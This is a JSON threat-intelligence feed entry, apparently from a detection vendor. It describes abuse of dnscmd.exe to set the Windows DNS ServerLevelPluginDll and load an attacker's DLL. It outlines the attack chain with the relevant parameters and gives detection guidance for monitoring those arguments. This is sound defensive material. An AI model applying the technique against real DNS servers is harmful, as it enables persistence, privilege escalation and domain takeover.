{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/products/windows-server/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Splunk Enterprise","Splunk Enterprise Security","Splunk Cloud","Windows Server"],"_cs_severities":["high"],"_cs_tags":["persistence","privilege-escalation","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Splunk"],"content_html":"\u003cp\u003eThe Microsoft DNS ServerLevelPluginDll setting allows the DNS service to load arbitrary DLLs. An attacker with DNS administrative privileges can abuse \u003ccode\u003ednscmd.exe\u003c/code\u003e to modify this setting and load a malicious DLL. This grants the attacker code execution in the context of the DNS service. This technique can be leveraged for persistence, privilege escalation, and even domain compromise. The abuse of this setting is particularly concerning because the DNS service often runs with elevated privileges, making it a highly desirable target for attackers. This technique has been observed in the wild and documented publicly, highlighting its potential for real-world impact. Defenders should monitor for unauthorized modifications to the ServerLevelPluginDll setting via \u003ccode\u003ednscmd.exe\u003c/code\u003e to mitigate this threat.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access through existing compromises or leveraging exploits.\u003c/li\u003e\n\u003cli\u003eThe attacker escalates privileges to obtain DNS administrative rights.\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003ednscmd.exe\u003c/code\u003e with the \u003ccode\u003e/config\u003c/code\u003e and \u003ccode\u003e/serverlevelplugindll\u003c/code\u003e parameters to set a malicious DLL.\u003c/li\u003e\n\u003cli\u003eThe DNS service loads the attacker-controlled DLL.\u003c/li\u003e\n\u003cli\u003eThe malicious DLL executes arbitrary code within the context of the DNS service.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves persistence by ensuring the malicious DLL is loaded on each DNS service restart.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the elevated privileges of the DNS service to perform actions such as lateral movement or data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code within the highly privileged context of the Windows DNS Server service. This can lead to complete domain compromise, allowing the attacker to control critical network infrastructure. The impact can range from data theft and service disruption to complete takeover of the Active Directory environment. The number of potential victims is significant, encompassing any organization running Windows DNS Server.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process execution for \u003ccode\u003ednscmd.exe\u003c/code\u003e with command-line arguments containing \u003ccode\u003e/config\u003c/code\u003e and \u003ccode\u003e/serverlevelplugindll\u003c/code\u003e using the provided Sigma rule.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 1 and Windows Event Log Security 4688 to capture process creation events.\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of \u003ccode\u003ednscmd.exe\u003c/code\u003e modifying the ServerLevelPluginDll setting.\u003c/li\u003e\n\u003cli\u003eImplement strict access controls to limit who can administer the DNS service.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-dnscmd-serverlevelplugin/","summary":"Attackers can use dnscmd.exe with administrative privileges to configure the Microsoft DNS ServerLevelPluginDll setting, allowing them to load arbitrary DLLs and execute code within the DNS service context for persistence and privilege escalation.","title":"Abuse of dnscmd.exe to Modify DNS ServerLevelPluginDLL","url":"https://feed.craftedsignal.io/briefs/2024-01-dnscmd-serverlevelplugin/"}],"language":"en","title":"CraftedSignal Threat Feed — Windows Server","version":"https://jsonfeed.org/version/1.1"}